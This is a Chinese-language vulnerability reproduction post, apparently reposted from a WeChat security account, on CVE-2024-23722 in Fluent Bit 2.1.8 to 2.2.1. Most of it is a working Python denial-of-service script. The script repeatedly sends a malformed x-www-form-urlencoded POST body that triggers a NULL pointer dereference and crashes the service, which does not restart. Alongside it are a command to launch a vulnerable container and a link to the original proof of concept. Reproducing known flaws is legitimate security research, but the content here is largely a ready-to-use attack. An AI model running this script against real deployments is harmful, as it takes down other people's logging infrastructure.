漏洞描述
在Fluent Bit 2.1.8到2.2.1中,可以通过内容类型为x-www-form-urlencoded的无效HTTP负载引起NULL指针解引用。它崩溃并且不重新启动。
资产测绘
FOFA:
漏洞复现
podman run -p8888:8888 -ti cr.fluentbit.io/fluent/fluent-bit:2.2.0 -t http -p port=8888 -o stdout
import requests
import time
import sys
def check_port(url):
try:
with requests.head(url):
return True
except requests.exceptions.ConnectionError:
return False
def send_request_every_second(url):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = 'A' # The body is now just the letter 'A'
while True:
if not check_port(url):
print("port is currently not open")
time.sleep(1)
continue
try:
response = requests.post(url, headers=headers, data=data)
print(f"Status Code: {response.status_code}, Response: {response.text} server does not seem exploitable")
except requests.exceptions.ConnectionError:
print("Server might have crashed")
time.sleep(1) # Wait for 1 second before sending the next request
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: script.py <URL>")
else:
url = sys.argv[1]
send_request_every_second(url)
python3 exploit.py http://127.0.0.1:8888
https://github.com/alexcote1/CVE-2024-23722-poc?tab=readme-ov-file
原文始发于微信公众号(漏洞文库):【漏洞复现】CVE-2024-23722
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论